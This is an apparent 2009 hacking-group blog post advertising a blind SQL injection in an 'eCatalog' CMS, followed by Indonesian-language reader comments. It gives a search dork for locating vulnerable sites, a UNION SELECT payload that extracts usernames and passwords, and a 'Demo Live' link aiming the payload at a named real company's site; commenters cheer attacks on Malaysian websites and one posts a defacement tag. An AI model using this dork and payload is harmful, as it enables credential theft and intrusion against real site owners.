eCatalog [MalingSial CMS] – Blind SQL Injection Vulnerability

Filed in Hacking , Software , Uncategorized 15 comments

————————————————————————————————————————————————————-

Author : YaDoY666

Contact : YaDoY666[a]ServerIsDown[dot]Org

Group : ServerIsDown

Date : September 27th, 2009

————————————————————————————————————————————————————-

[-] Dork

[+] “catalog/details.asp?id=” or use your own keyword

[-] Exploit

[+] details.asp?id=[id]+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user

[-] POC

http://127.0.0.1/catalog/details.asp?id=706+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user

[-] Demo Live

http://www.honourfurniture.com.my/catalog/details.asp?id=771+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user

[-] Greetz

Jack-, Don Tukuleso, XShadow, Kecemplungkalen, v3nom, indounderground, mistersaint, m3g4tr0n, gblack, miya666, ServerIsDown, Mainhack Brotherhood, Indonesian Coder, You.

- Proud To Be Indonesian -

[*] Cepet sembuh yah mi, Luph you always [*]

Posted by YaDoY666   @   27 September 2009 15 comments

Share This Post

RSS Digg Twitter StumbleUpon Delicious Technorati

15 Comments

Comments
Sep 27, 2009
10:16
#1 Jack :

PERTAMAX!!
Wow,.. keren doy :”>
saya suka dengan ini…
*BRB* SCAN
semoga tidak gagal pertamax :D

Author Sep 27, 2009
10:17
#2 YaDoY666 :

Hahahaha…
Silahkan Jack-

Sep 27, 2009
10:57

gagal pertamax

Oct 1, 2009
16:18
Author Oct 1, 2009
19:52
#5 YaDoY666 :

Yuuuk mareeee

Ratakan…!!!

Oct 3, 2009
17:40
#6 jojo :

ayo dong gan,,,,,,,, btw gan situs jasakom di hack ya………….

Author Oct 3, 2009
22:22
#7 YaDoY666 :

Apaan yg ayo?

jasakom di hack? dah di hack balik tuh… :P

Oct 7, 2009
17:38
#8 denbayan :

@ jojo : tapi di pojok kiri bawah transfer dari jatimcrew
mending jangan dibuka lagi , katanya bahaya ,,,,,
maaf so tau ,,,

Oct 17, 2009
17:11
#9 paddi :

Wahhh, mata jadi sakit nih liat warnanya,wkwkwkw

Oct 26, 2009
06:30
#10 kaka11ai.net :

Salam Hormat suhu2 dan shifu2….

Oct 26, 2009
06:31
#11 kaka11 :

Salah nulis nama pulak…wakakakka…

Nov 20, 2009
18:36
#12 andri :

mas…
nie hanya permintaan kecil saya dan newbie yang laen di seluruh nusantara…
gimana kalau website anda membuat artikel tentang semua artikel mengenai website yang sudah di hack….
khusus na website malaysia….
apa lagi sekarang lagi marak2 tapi informasi na hanya alamat website yang sudah dihack..
walaupun kami tidak bisa membantu dalam menghack website malaysia tapi kami butuh informasi tentang apa yang sudah dihack…
tolong ya mas yadoy666

Dec 9, 2009
17:07
#13 ciute :

..::HACKED BY CIUTEGIRL::..
Earth Under Attack :
thanks –>>>: HACKER NEWBIE..::(C1u7e G1rl)::..http://www.ciutegirl.comcontact us: ciutegirl@rocketmail.com
</DI

Jan 31, 2010
02:02
#14 coboyina :

‘thanks buat tutorialnya
‘support buat dulur2 semua yg dah hack sites si MaLIng tukang nyokot budaya urang… Sori teu bisa bantu banyak.. Can bisa web sih ngan bisa VB hungkul T_T
Ajarin atuh a’

Feb 1, 2010
15:13
#15 Joglo :

maknyus ene doy.. dapet banyak @_@

Leave a Comment

Previous Post
«
Next Post
»
Black Tribe designed by Premium Wordpress Themes  |  Brought to you by Windows Hosting from the #1 Web Hosting Provider - HostNexus.